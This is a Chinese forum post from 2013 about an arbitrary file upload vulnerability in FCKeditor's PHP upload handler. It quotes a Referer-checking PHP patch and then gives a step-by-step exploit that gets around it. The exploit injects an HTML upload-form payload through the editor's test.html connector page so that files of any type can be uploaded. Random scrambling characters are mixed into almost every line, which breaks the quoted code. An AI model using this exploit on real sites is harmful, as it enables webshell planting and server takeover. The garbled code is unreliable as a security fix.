漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
`! Z3 R7 P6 w* \- d4 I" @- i网上给出的修复方案是
, h) _- Q% G3 K8 k; ]' A修复方法,删除FCK编辑器用其他的编辑器
3 r3 Z4 c) e) P, i. i或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件! s5 [! U. \1 b3 z! |' F4 p/ n
在
7 D2 H, {! r! krequire(‘config.php’);
- A5 f( S. n; Jrequire(‘util.php’);+ v6 A8 d0 C2 ?9 X
的下面添加以下代码—————————–* p7 Q0 T1 t% P0 E6 q6 z
//防止外部提交0 |1 _( }" s/ {' v: h
function outsidepost()
' S1 E! ~9 j( x4 J+ Q. {+ W{
& K* }+ q; U* w r$servername=$_SERVER['SERVER_NAME'];+ U! | I3 \6 l; U1 Z
$sub_from=@$_SERVER['HTTP_REFERER'];6 d! u. F! C0 L
$sub_len=strlen($servername);$ W1 }2 o, l U. [& c+ o8 M& p
$checkfrom=substr($sub_from,7,$sub_len);! y- }) l% K f3 r
if($checkfrom!=$servername){* j- o+ R' I0 ~
echo(“you don’t outsidepost!”);% U$ l7 C, J: o
exit;
; x6 r7 t6 z( |! L7 Q p}
$ ^' t3 x, r: G8 F}
2 S2 O( s2 H) m4 O' e moutsidepost();/ D) V$ ?/ ~* a2 d
防止外部提交,但是没有防止内部提交,
- r. ~/ t$ o% a0 B' m* ?6 [2 s+ I利用方法:
5 ^. j: f& l5 J1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html9 U' C1 O2 T" W, t D0 a
2,在Current Folder 框输入 t9 x! D. \; e- K
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>, \- J+ U9 j8 j C/ U
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
( ?& I0 Z/ u' O" ?/ @PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对